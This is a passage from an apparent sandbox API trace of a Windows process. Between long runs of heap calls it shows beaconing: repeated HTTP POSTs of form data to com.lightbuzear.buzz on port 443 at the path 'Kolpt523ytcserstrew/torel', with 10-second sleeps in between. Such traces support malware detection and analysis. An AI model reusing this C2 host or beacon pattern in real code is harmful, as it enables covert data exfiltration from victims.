hHeap=0x4780000) returned 1 [0252.708] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0252.708] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0252.709] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0252.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0252.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0252.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0252.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bf0 [0252.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0252.709] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bc0 [0252.709] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bf0 | out: hHeap=0x4780000) returned 1 [0252.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0252.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0252.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48001e0 [0252.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0252.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0252.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48001e0 | out: hHeap=0x4780000) returned 1 [0252.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48000c8 [0252.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0252.710] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800488 [0252.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0252.710] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0252.711] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0252.711] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0252.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800488 | out: hHeap=0x4780000) returned 1 [0252.711] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0252.711] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0252.711] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0252.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0252.711] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0252.711] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0252.711] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bf0 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c08 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bf0 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800370 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800370 | out: hHeap=0x4780000) returned 1 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48000f0 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0252.712] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800370 [0252.712] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0252.713] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0252.713] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0252.713] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0252.713] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800370 | out: hHeap=0x4780000) returned 1 [0252.713] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0252.722] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0252.722] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0252.723] FreeLibrary (hLibModule=0x71570000) returned 1 [0252.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0252.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0252.723] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0252.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800c30 | out: hHeap=0x4780000) returned 1 [0252.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800dc0 | out: hHeap=0x4780000) returned 1 [0252.724] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0252.724] Sleep (dwMilliseconds=0x2710) [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48159e0 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0252.733] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0252.733] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48159e0 | out: hHeap=0x4780000) returned 1 [0252.734] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48159e0 [0252.734] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0252.734] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0252.734] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0252.734] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800c30 [0252.734] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815a40 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c68 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815a40 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c68 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f28 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0252.735] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800dc0 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0252.735] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0252.736] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0252.736] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0252.736] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0252.736] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0252.736] FreeLibrary (hLibModule=0x71780000) returned 1 [0252.737] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0252.737] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0252.737] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0252.737] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0252.737] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0252.737] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0252.737] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815b00 [0252.738] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0252.738] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b00 | out: hHeap=0x4780000) returned 1 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0252.738] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b00 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0252.738] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0252.738] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0252.738] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800118 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0252.738] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0252.738] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bd8 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b18 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bd8 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b18 | out: hHeap=0x4780000) returned 1 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b60 [0252.739] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800190 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800190 | out: hHeap=0x4780000) returned 1 [0252.739] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0252.739] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0252.740] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0252.740] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0252.740] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0252.740] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bd8 [0252.740] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0252.740] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b18 [0252.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bd8 | out: hHeap=0x4780000) returned 1 [0252.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0252.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b18 | out: hHeap=0x4780000) returned 1 [0252.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800438 [0252.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0252.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0252.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800438 | out: hHeap=0x4780000) returned 1 [0252.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800258 [0252.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0252.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0252.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0252.742] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0252.742] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0252.742] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0252.742] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0252.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0252.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0252.742] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0252.742] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bd8 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bd8 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800140 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0252.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800140 | out: hHeap=0x4780000) returned 1 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002d0 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0252.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800168 [0252.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0252.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0252.744] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0252.744] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0254.058] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800168 | out: hHeap=0x4780000) returned 1 [0254.059] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0254.059] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0254.059] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0254.059] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0254.059] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0254.059] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0254.059] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0254.059] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0254.059] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815b90 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b78 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b90 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800528 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0254.060] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800528 | out: hHeap=0x4780000) returned 1 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800320 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0254.060] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0254.061] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0254.061] HeapFree (in: hHeap=0x4780000, 